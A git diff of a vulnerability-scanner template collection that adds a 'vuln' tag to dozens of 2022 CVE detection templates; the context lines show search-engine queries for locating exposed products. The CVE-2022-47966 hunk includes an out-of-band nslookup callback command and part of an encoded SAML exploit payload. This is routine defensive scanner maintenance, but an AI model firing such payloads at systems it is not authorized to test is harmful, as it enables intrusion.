cve,cve2022,rukovoditel,stored-xss,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml index b6ed21a2c16..8e0a3e934ac 100644 --- a/http/cves/2022/CVE-2022-43170.yaml +++ b/http/cves/2022/CVE-2022-43170.yaml @@ -29,7 +29,7 @@ info: product: rukovoditel shodan-query: http.favicon.hash:-1499940355 fofa-query: icon_hash=-1499940355 - tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml index af4d8799d7f..1b61d5ef209 100644 --- a/http/cves/2022/CVE-2022-43185.yaml +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -27,7 +27,7 @@ info: product: rukovoditel shodan-query: http.favicon.hash:-1499940355 fofa-query: icon_hash=-1499940355 - tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-4320.yaml b/http/cves/2022/CVE-2022-4320.yaml index 196dd921568..102a521722f 100644 --- a/http/cves/2022/CVE-2022-4320.yaml +++ b/http/cves/2022/CVE-2022-4320.yaml @@ -26,7 +26,7 @@ info: vendor: mhsoftware product: wordpress_events_calendar_plugin framework: wordpress - tags: cve,cve2022,calendar,event,xss,wordpress,wp,wp-plugin,wpscan,mhsoftware + tags: cve,cve2022,calendar,event,xss,wordpress,wp,wp-plugin,wpscan,mhsoftware,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-4321.yaml b/http/cves/2022/CVE-2022-4321.yaml index ae1284b83c9..bd92fdc7e2b 100644 --- a/http/cves/2022/CVE-2022-4321.yaml +++ b/http/cves/2022/CVE-2022-4321.yaml @@ -32,7 +32,7 @@ info: shodan-query: http.html:/wp-content/plugins/pdf-generator-for-wp fofa-query: body=/wp-content/plugins/pdf-generator-for-wp publicwww-query: "/wp-content/plugins/pdf-generator-for-wp" - tags: cve,cve2022,wpscan,wordpress,wp,wp-plugin,xss,pdf-generator-for-wp,wpswings + tags: cve,cve2022,wpscan,wordpress,wp,wp-plugin,xss,pdf-generator-for-wp,wpswings,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-4325.yaml b/http/cves/2022/CVE-2022-4325.yaml index baac3f47d19..bafbcb26519 100644 --- a/http/cves/2022/CVE-2022-4325.yaml +++ b/http/cves/2022/CVE-2022-4325.yaml @@ -27,7 +27,7 @@ info: vendor: ifeelweb product: post_status_notifier_lite framework: wordpress - tags: cve,cve2022,wp,wordpress,wpscan,authenticated,xss,wp-plugin,post-status-notifier-lite,ifeelweb + tags: cve,cve2022,wp,wordpress,wpscan,authenticated,xss,wp-plugin,post-status-notifier-lite,ifeelweb,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-4328.yaml b/http/cves/2022/CVE-2022-4328.yaml index 49f1343c097..f4039d48c55 100644 --- a/http/cves/2022/CVE-2022-4328.yaml +++ b/http/cves/2022/CVE-2022-4328.yaml @@ -25,7 +25,7 @@ info: vendor: najeebmedia product: woocommerce_checkout_field_manager framework: wordpress - tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia,fileupload,vkev + tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia,fileupload,vkev,vuln variables: string: "CVE-2022-4328" diff --git a/http/cves/2022/CVE-2022-4375.yaml b/http/cves/2022/CVE-2022-4375.yaml index 1b7134e034c..b9c188bfbca 100644 --- a/http/cves/2022/CVE-2022-4375.yaml +++ b/http/cves/2022/CVE-2022-4375.yaml @@ -28,7 +28,7 @@ info: product: mcms shodan-query: http.favicon.hash:1464851260 fofa-query: icon_hash="1464851260" - tags: cve,cve2022,mingsoft,mcms,sqli + tags: cve,cve2022,mingsoft,mcms,sqli,vuln flow: http(1) && http(2) diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index 6bf0e90769a..2849b259cbe 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -28,7 +28,7 @@ info: product: vantara_pentaho_business_analytics_server shodan-query: http.favicon.hash:1749354953 fofa-query: icon_hash=1749354953 - tags: cve,cve2022,packetstorm,rce,ssti,pentaho,hitachi,kev,vkev + tags: cve,cve2022,packetstorm,rce,ssti,pentaho,hitachi,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-43939.yaml b/http/cves/2022/CVE-2022-43939.yaml index b31f14245b7..7aa1c439c15 100644 --- a/http/cves/2022/CVE-2022-43939.yaml +++ b/http/cves/2022/CVE-2022-43939.yaml @@ -25,7 +25,7 @@ info: product: vantara_pentaho_business_analytics_server shodan-query: http.favicon.hash:1749354953 fofa-query: icon_hash=1749354953 - tags: cve,cve2022,pentaho,hitachi,auth-bypass,vkev,kev + tags: cve,cve2022,pentaho,hitachi,auth-bypass,vkev,kev,vuln flow: http(1) && http(2) diff --git a/http/cves/2022/CVE-2022-44290.yaml b/http/cves/2022/CVE-2022-44290.yaml index d3384c3f5cd..16df61902a3 100644 --- a/http/cves/2022/CVE-2022-44290.yaml +++ b/http/cves/2022/CVE-2022-44290.yaml @@ -24,7 +24,7 @@ info: max-request: 2 vendor: webtareas_project product: webtareas - tags: time-based-sqli,cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project + tags: time-based-sqli,cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-44291.yaml b/http/cves/2022/CVE-2022-44291.yaml index f4997bc4f64..154b3070254 100644 --- a/http/cves/2022/CVE-2022-44291.yaml +++ b/http/cves/2022/CVE-2022-44291.yaml @@ -24,7 +24,7 @@ info: max-request: 2 vendor: webtareas_project product: webtareas - tags: time-based-sqli,cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project + tags: time-based-sqli,cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-44356.yaml b/http/cves/2022/CVE-2022-44356.yaml index 39a42c1b769..9b0d318722b 100644 --- a/http/cves/2022/CVE-2022-44356.yaml +++ b/http/cves/2022/CVE-2022-44356.yaml @@ -25,7 +25,7 @@ info: product: wl-wn531g3_firmware shodan-query: html:"WN531G3" fofa-query: body="WN531G3" - tags: cve,cve2022,wavlink,exposure,wn531g3 + tags: cve,cve2022,wavlink,exposure,wn531g3,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-4447.yaml b/http/cves/2022/CVE-2022-4447.yaml index dc4dbd6ec5f..501f5d26de4 100644 --- a/http/cves/2022/CVE-2022-4447.yaml +++ b/http/cves/2022/CVE-2022-4447.yaml @@ -30,7 +30,7 @@ info: vendor: fontsy_project product: fontsy framework: wordpress - tags: cve,cve2022,wordpress,wp,wpscan,wp-plugin,sqli,fontsy,unauth,fontsy_project,vkev + tags: cve,cve2022,wordpress,wp,wpscan,wp-plugin,sqli,fontsy,unauth,fontsy_project,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml index bdedd9910ab..dbae803a3d9 100644 --- a/http/cves/2022/CVE-2022-44877.yaml +++ b/http/cves/2022/CVE-2022-44877.yaml @@ -34,7 +34,7 @@ info: - http.title:"login | control webpanel" fofa-query: title="login | control webpanel" google-query: intitle:"login | control webpanel" - tags: cve,cve2022,packetstorm,centos,rce,kev,control-webpanel,vkev + tags: cve,cve2022,packetstorm,centos,rce,kev,control-webpanel,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index 347e07b7738..5f335ba2cdd 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -30,7 +30,7 @@ info: product: rukovoditel shodan-query: http.favicon.hash:-1499940355 fofa-query: icon_hash=-1499940355 - tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated + tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml index aac72b6a5ea..651301c781e 100644 --- a/http/cves/2022/CVE-2022-44946.yaml +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -28,7 +28,7 @@ info: product: rukovoditel shodan-query: http.favicon.hash:-1499940355 fofa-query: icon_hash=-1499940355 - tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml index 0e865c21dcf..85b7f597616 100644 --- a/http/cves/2022/CVE-2022-44947.yaml +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -30,7 +30,7 @@ info: product: rukovoditel shodan-query: http.favicon.hash:-1499940355 fofa-query: icon_hash=-1499940355 - tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated + tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index 48f5833680f..03050f0e941 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -30,7 +30,7 @@ info: product: rukovoditel shodan-query: http.favicon.hash:-1499940355 fofa-query: icon_hash=-1499940355 - tags: cve,cve2022,rukovoditel,xss,stored-xss,authenticated + tags: cve,cve2022,rukovoditel,xss,stored-xss,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml index cf305ccb6fe..08a522fc735 100644 --- a/http/cves/2022/CVE-2022-44949.yaml +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -30,7 +30,7 @@ info: product: rukovoditel shodan-query: http.favicon.hash:-1499940355 fofa-query: icon_hash=-1499940355 - tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index d46643f2ca9..91aefb6704c 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -30,7 +30,7 @@ info: product: rukovoditel shodan-query: http.favicon.hash:-1499940355 fofa-query: icon_hash=-1499940355 - tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml index 338337bcf16..5b6783997a0 100644 --- a/http/cves/2022/CVE-2022-44951.yaml +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -30,7 +30,7 @@ info: product: rukovoditel shodan-query: http.favicon.hash:-1499940355 fofa-query: icon_hash=-1499940355 - tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml index f03c9a8dcd1..5693631f39c 100644 --- a/http/cves/2022/CVE-2022-44952.yaml +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -30,7 +30,7 @@ info: product: rukovoditel shodan-query: http.favicon.hash:-1499940355 fofa-query: icon_hash=-1499940355 - tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-44957.yaml b/http/cves/2022/CVE-2022-44957.yaml index e25d553927b..11a3f1a50f3 100644 --- a/http/cves/2022/CVE-2022-44957.yaml +++ b/http/cves/2022/CVE-2022-44957.yaml @@ -24,7 +24,7 @@ info: max-request: 3 vendor: webtareas_project product: webtareas - tags: cve,cve2022,xss,webtareas,authenticated,intrusive,webtareas_project + tags: cve,cve2022,xss,webtareas,authenticated,intrusive,webtareas_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-45037.yaml b/http/cves/2022/CVE-2022-45037.yaml index 328abd10497..504135a7746 100644 --- a/http/cves/2022/CVE-2022-45037.yaml +++ b/http/cves/2022/CVE-2022-45037.yaml @@ -27,7 +27,7 @@ info: max-request: 5 vendor: wbce product: wbce_cms - tags: cve,cve2022,xss,wbce,cms,authenticated + tags: cve,cve2022,xss,wbce,cms,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-45038.yaml b/http/cves/2022/CVE-2022-45038.yaml index bfc3fbcd76f..767a659ba70 100644 --- a/http/cves/2022/CVE-2022-45038.yaml +++ b/http/cves/2022/CVE-2022-45038.yaml @@ -27,7 +27,7 @@ info: max-request: 5 vendor: wbce product: wbce_cms - tags: cve2022,cve,xss,wbce,cms,authenticated + tags: cve2022,cve,xss,wbce,cms,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-45269.yaml b/http/cves/2022/CVE-2022-45269.yaml index b54c29a704a..39016403225 100644 --- a/http/cves/2022/CVE-2022-45269.yaml +++ b/http/cves/2022/CVE-2022-45269.yaml @@ -22,7 +22,7 @@ info: fofa-query: "SCS.Web.Server.SPI/1.0" verified: true max-request: 1 - tags: cve,cve2022,linx,lfi,scs + tags: cve,cve2022,linx,lfi,scs,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml index 3e1df2b2292..973615fdfd5 100644 --- a/http/cves/2022/CVE-2022-45354.yaml +++ b/http/cves/2022/CVE-2022-45354.yaml @@ -32,7 +32,7 @@ info: - html:"/wp-content/plugins/download-monitor/" - http.html:"/wp-content/plugins/download-monitor/" fofa-query: body="/wp-content/plugins/download-monitor/" - tags: cve,cve2022,wordpress,wp-plugin,download-monitor,wp,wpchill,vkev + tags: cve,cve2022,wordpress,wp-plugin,download-monitor,wp,wpchill,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-45362.yaml b/http/cves/2022/CVE-2022-45362.yaml index ab2e11bee29..908d3921a69 100644 --- a/http/cves/2022/CVE-2022-45362.yaml +++ b/http/cves/2022/CVE-2022-45362.yaml @@ -27,7 +27,7 @@ info: vendor: paytm product: payment_gateway framework: wordpress - tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth,oast,paytm + tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth,oast,paytm,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-45365.yaml b/http/cves/2022/CVE-2022-45365.yaml index cdd7cfa8aff..594888b1156 100644 --- a/http/cves/2022/CVE-2022-45365.yaml +++ b/http/cves/2022/CVE-2022-45365.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/stock-ticker/ fofa-query: body=/wp-content/plugins/stock-ticker/ publicwww-query: "/wp-content/plugins/stock-ticker/" - tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss,urosevic + tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss,urosevic,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-45699.yaml b/http/cves/2022/CVE-2022-45699.yaml index bd065e30954..2af5d1c4fc2 100644 --- a/http/cves/2022/CVE-2022-45699.yaml +++ b/http/cves/2022/CVE-2022-45699.yaml @@ -19,7 +19,7 @@ info: metadata: vendor: apsystems product: ecu-r_firmware - tags: cve,cve2022,rce,apsystems,vkev + tags: cve,cve2022,rce,apsystems,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2022/CVE-2022-45805.yaml b/http/cves/2022/CVE-2022-45805.yaml index 02884911c16..97403678826 100644 --- a/http/cves/2022/CVE-2022-45805.yaml +++ b/http/cves/2022/CVE-2022-45805.yaml @@ -29,7 +29,7 @@ info: vendor: paytm product: payment_gateway framework: wordpress - tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,paytm-payments,authenticated,paytm + tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,paytm-payments,authenticated,paytm,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-45808.yaml b/http/cves/2022/CVE-2022-45808.yaml index 2870acc412e..695b1533ae3 100644 --- a/http/cves/2022/CVE-2022-45808.yaml +++ b/http/cves/2022/CVE-2022-45808.yaml @@ -26,7 +26,7 @@ info: shodan-query: http.html:"/wp-content/plugins/learnpress" fofa-query: body="/wp-content/plugins/learnpress" publicwww-query: /wp-content/plugins/learnpress - tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,sqli,time-based-sqli,vkev + tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,sqli,time-based-sqli,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-45835.yaml b/http/cves/2022/CVE-2022-45835.yaml index c18a3f06278..abec6d004d1 100644 --- a/http/cves/2022/CVE-2022-45835.yaml +++ b/http/cves/2022/CVE-2022-45835.yaml @@ -28,7 +28,7 @@ info: vendor: phonepe product: phonepe framework: wordpress - tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,phonepe-payment-solutions,unauth,oast,phonepe,vkev + tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,phonepe-payment-solutions,unauth,oast,phonepe,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml index 76d7a79b1bc..9d5e87e4860 100644 --- a/http/cves/2022/CVE-2022-45917.yaml +++ b/http/cves/2022/CVE-2022-45917.yaml @@ -33,7 +33,7 @@ info: - http.html:"ILIAS" - http.html:"ilias" fofa-query: body="ilias" - tags: cve,cve2022,redirect,packetstorm,seclists,ilias,xss + tags: cve,cve2022,redirect,packetstorm,seclists,ilias,xss,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-45933.yaml b/http/cves/2022/CVE-2022-45933.yaml index 277f0e87bed..f80a4fb2df3 100644 --- a/http/cves/2022/CVE-2022-45933.yaml +++ b/http/cves/2022/CVE-2022-45933.yaml @@ -35,7 +35,7 @@ info: - icon_hash=-379154636 - title="kubeview" google-query: intitle:"kubeview" - tags: cve,cve2022,kubeview,kubernetes,exposure,kubeview_project,vkev + tags: cve,cve2022,kubeview,kubernetes,exposure,kubeview_project,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-46020.yaml b/http/cves/2022/CVE-2022-46020.yaml index de63407629c..1b9483a7213 100644 --- a/http/cves/2022/CVE-2022-46020.yaml +++ b/http/cves/2022/CVE-2022-46020.yaml @@ -27,7 +27,7 @@ info: max-request: 6 vendor: wbce product: wbce_cms - tags: cve,cve2022,rce,wbce,cms,authenticated,intrusive + tags: cve,cve2022,rce,wbce,cms,authenticated,intrusive,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml index 5f11928053c..ca5f307d1be 100644 --- a/http/cves/2022/CVE-2022-46071.yaml +++ b/http/cves/2022/CVE-2022-46071.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: helmet_store_showroom_site_project product: helmet_store_showroom_site - tags: cve,cve2022,sqli,admin-bypass,helmet,helmet_store_showroom_site_project + tags: cve,cve2022,sqli,admin-bypass,helmet,helmet_store_showroom_site_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml index 2ede27c2b70..199ea092339 100644 --- a/http/cves/2022/CVE-2022-46073.yaml +++ b/http/cves/2022/CVE-2022-46073.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: helmet_store_showroom_project product: helmet_store_showroom - tags: cve2022,cve,xss,helmet-store-showroom,helmet_store_showroom_project + tags: cve2022,cve,xss,helmet-store-showroom,helmet_store_showroom_project,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml index 86ee930ca10..93e55c699f2 100644 --- a/http/cves/2022/CVE-2022-46169.yaml +++ b/http/cves/2022/CVE-2022-46169.yaml @@ -41,7 +41,7 @@ info: google-query: - intitle:"cacti" - intitle:"login to cacti" - tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth,vkev + tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth,vkev,vuln variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml index 32d0f987c98..3471a5abbf5 100644 --- a/http/cves/2022/CVE-2022-46381.yaml +++ b/http/cves/2022/CVE-2022-46381.yaml @@ -33,7 +33,7 @@ info: - http.html:"Linear eMerge" - http.html:"linear emerge" fofa-query: body="linear emerge" - tags: cve,cve2022,xss,emerge,linear,niceforyou,vkev + tags: cve,cve2022,xss,emerge,linear,niceforyou,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-46443.yaml b/http/cves/2022/CVE-2022-46443.yaml index 8d157112a82..d779a2f244e 100644 --- a/http/cves/2022/CVE-2022-46443.yaml +++ b/http/cves/2022/CVE-2022-46443.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: bangresto_project product: bangresto - tags: cve,cve2022,bangresto,sqli,bangresto_project + tags: cve,cve2022,bangresto,sqli,bangresto_project,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-46888.yaml b/http/cves/2022/CVE-2022-46888.yaml index b3470b94963..8b6257ca1a3 100644 --- a/http/cves/2022/CVE-2022-46888.yaml +++ b/http/cves/2022/CVE-2022-46888.yaml @@ -31,7 +31,7 @@ info: - http.favicon.hash:-582931176 - cpe:"cpe:2.3:a:nexusphp:nexusphp" fofa-query: icon_hash=-582931176 - tags: cve,cve2022,nexus,php,nexusphp,xss + tags: cve,cve2022,nexus,php,nexusphp,xss,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml index 7910de8084a..c06e7a3a8f6 100644 --- a/http/cves/2022/CVE-2022-46934.yaml +++ b/http/cves/2022/CVE-2022-46934.yaml @@ -32,7 +32,7 @@ info: fofa-query: - body="kkfileview" - app="kkfileview" - tags: cve,cve2022,xss,kkfileview,keking + tags: cve,cve2022,xss,kkfileview,keking,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-47002.yaml b/http/cves/2022/CVE-2022-47002.yaml index 53a225aa2cb..82be96191c1 100644 --- a/http/cves/2022/CVE-2022-47002.yaml +++ b/http/cves/2022/CVE-2022-47002.yaml @@ -32,7 +32,7 @@ info: shodan-query: - 'Generator: Masa CMS' - "generator: masa cms" - tags: cve,cve2022,auth-bypass,cms,masa,masacms + tags: cve,cve2022,auth-bypass,cms,masa,masacms,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-47003.yaml b/http/cves/2022/CVE-2022-47003.yaml index 1c1b005d09b..5e148cc6a19 100644 --- a/http/cves/2022/CVE-2022-47003.yaml +++ b/http/cves/2022/CVE-2022-47003.yaml @@ -32,7 +32,7 @@ info: shodan-query: - 'Generator: Mura CMS' - "generator: mura cms" - tags: cve,cve2022,auth-bypass,cms,mura,murasoftware + tags: cve,cve2022,auth-bypass,cms,mura,murasoftware,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-47075.yaml b/http/cves/2022/CVE-2022-47075.yaml index 541ac347254..3012ae9c745 100644 --- a/http/cves/2022/CVE-2022-47075.yaml +++ b/http/cves/2022/CVE-2022-47075.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: smartofficepayroll product: smartoffice - tags: cve,cve2022,packetstorm,smart-office,info,exposure,smartofficepayroll,vkev + tags: cve,cve2022,packetstorm,smart-office,info,exposure,smartofficepayroll,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-47501.yaml b/http/cves/2022/CVE-2022-47501.yaml index c8daa29c12c..113167f4b33 100644 --- a/http/cves/2022/CVE-2022-47501.yaml +++ b/http/cves/2022/CVE-2022-47501.yaml @@ -32,7 +32,7 @@ info: - "app=\"Apache_OFBiz\"" - body="ofbiz" - app="apache_ofbiz" - tags: cve,cve2022,apache,ofbiz,lfi,vkev + tags: cve,cve2022,apache,ofbiz,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml index dc976ac9c90..b7fde1253e9 100644 --- a/http/cves/2022/CVE-2022-47615.yaml +++ b/http/cves/2022/CVE-2022-47615.yaml @@ -32,7 +32,7 @@ info: shodan-query: http.html:/wp-content/plugins/learnpress fofa-query: body=/wp-content/plugins/learnpress publicwww-query: "/wp-content/plugins/learnpress" - tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi,thimpress,vkev + tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi,thimpress,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-47945.yaml b/http/cves/2022/CVE-2022-47945.yaml index d1f0b14ef96..5b4b8d01238 100644 --- a/http/cves/2022/CVE-2022-47945.yaml +++ b/http/cves/2022/CVE-2022-47945.yaml @@ -37,7 +37,7 @@ info: - header="think_lang" - title="thinkphp" google-query: intitle:"thinkphp" - tags: cve,cve2022,thinkphp,lfi,vkev + tags: cve,cve2022,thinkphp,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index da5341c2d69..610d4b08f22 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml @@ -33,7 +33,7 @@ info: - http.title:"manageengine" fofa-query: title="manageengine" google-query: intitle:"manageengine" - tags: cve,cve2022,packetstorm,rce,zoho,manageengine,oast,kev,zohocorp,vkev + tags: cve,cve2022,packetstorm,rce,zoho,manageengine,oast,kev,zohocorp,vkev,vuln variables: cmd: 'nslookup {{interactsh-url}}' SAMLResponse: a H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000= RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw== diff --git a/http/cves/2022/CVE-2022-47986.yaml b/http/cves/2022/CVE-2022-47986.yaml index def48bea75b..13af322b1f0 100644 --- a/http/cves/2022/CVE-2022-47986.yaml +++ b/http/cves/2022/CVE-2022-47986.yaml @@ -31,7 +31,7 @@ info: shodan-query: - html:"Aspera Faspex" - cpe:"cpe:2.3:o:linux:linux_kernel" - tags: cve,cve2022,ibm,aspera,faspex,kev,packetstorm,linux,vkev + tags: cve,cve2022,ibm,aspera,faspex,kev,packetstorm,linux,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-48012.yaml b/http/cves/2022/CVE-2022-48012.yaml index 72c26b6ddc3..92249378744 100644 --- a/http/cves/2022/CVE-2022-48012.yaml +++ b/http/cves/2022/CVE-2022-48012.yaml @@ -32,7 +32,7 @@ info: - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" - tags: cve,cve2022,xss,opencats,authenticated + tags: cve,cve2022,xss,opencats,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-48164.yaml b/http/cves/2022/CVE-2022-48164.yaml index a87c65c990c..0cf069a5ec9 100644 --- a/http/cves/2022/CVE-2022-48164.yaml +++ b/http/cves/2022/CVE-2022-48164.yaml @@ -24,7 +24,7 @@ info: product: wl-wn533a8_firmware shodan-query: html:"WN533A8" fofa-query: body="WN533A8" - tags: cve,cve2022,wavlink,exposure,wn533a8,vkev + tags: cve,cve2022,wavlink,exposure,wn533a8,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2022/CVE-2022-48165.yaml b/http/cves/2022/CVE-2022-48165.yaml index 10071fb0daf..dcff31f206b 100644 --- a/http/cves/2022/CVE-2022-48165.yaml +++ b/http/cves/2022/CVE-2022-48165.yaml @@ -31,7 +31,7 @@ info: product: wl-wn530h4_firmware shodan-query: http.favicon.hash:-1350437236 fofa-query: icon_hash=-1350437236 - tags: cve2022,cve,wavlink,router,exposure + tags: cve2022,cve,wavlink,router,exposure,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-48166.yaml b/http/cves/2022/CVE-2022-48166.yaml index 4a87941215c..03034a075e9 100644 --- a/http/cves/2022/CVE-2022-48166.yaml +++ b/http/cves/2022/CVE-2022-48166.yaml @@ -26,7 +26,7 @@ info: product: wn530hg4_firmware shodan-query: html:"WN530HG4" fofa-query: body="WN530HG4" - tags: cve,cve2022,wavlink,exposure,wn530hg4 + tags: cve,cve2022,wavlink,exposure,wn530hg4,vuln flow: http(1) && http(2) diff --git 